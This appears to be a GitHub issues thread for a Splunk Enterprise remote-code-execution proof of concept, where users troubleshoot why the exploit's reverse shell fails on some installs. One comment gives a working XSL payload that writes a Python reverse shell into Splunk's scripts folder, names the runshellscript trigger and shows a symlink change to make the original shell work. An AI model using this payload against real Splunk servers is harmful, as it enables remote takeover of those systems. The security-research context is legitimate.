nathan31337 / splunk-rce-poc Goto Github PK

I was testing the exploit script on our non-docker Splunk Enterprise 9.0.4 test environment and had an issue with triggering the uploaded reverse shell. It was interesting because the shell.sh was uploaded and the contents were correct. The exploit script said it was triggered and shell should be achieved. I could also run the same command on the Splunk VM and connect to nc. So the uploaded reverse shell was fine. But when the exploit script triggered the reverse shell via |runshellscript "shell.sh" "" "" "" "" "" "" "" "<jsid>", I would get an error.

When I tinkered with the uploaded shell and triggered the runshellscript from Splunk web interface, I noticed a change in the error code. That led me to explore other reverse shell options. One of the simple fixes was to replace the original reverse shell with a python reverse shell in the exploit script. For example:

<exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
        <xsl:text>export RHOST="{ip}";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</xsl:text>
    </exsl:document>

The python reverse shell works fine. But still I was confused why the original sh -i ... reverse shell was failing when triggered via the runshellscript.

We looked over it with my colleague Kert and he figured what our issue was. Splunk's runshellscript executes the shell.sh with /bin/sh. But /bin/sh in itself is a symlink. In docker versions of Splunk, it points to /bin/bash and the original exploit code works like a charm. In our environment /bin/sh was pointing to /bin/dash. Dash could not do the original reverse shell, hence was failing.

So if someone is having a similar issue, replace the original reverse shell of the exploit script with something else like python based (see above). Or, point sh to bash instead of dash with:

ln -s /bin/bash /bin/sh -f

Exploit will not work at first.
I uploaded a file manually and got a message text.
Then I changed the exploit code and hardcoded a message text.
Then getting job is fine.

Turning proxy on (that part was sweet)

Fire exploit, see this on file upload stage

Upload xsl file manualy

Changing exploit

After hardcoded message text

idk how to fix it, probably headers are wrong.

Thank you for a great research,
BR

So i have tried installing splunk 9.0.1 and also 9.1.1 as stated in previous issue by you and also on your blog. I have tried both ways (Installing it on ubuntu and via docker too). I am getting same error. I am attaching a screenshot below. The upper one is on on prem version and below one was tried on docker as stated bu you in issue 1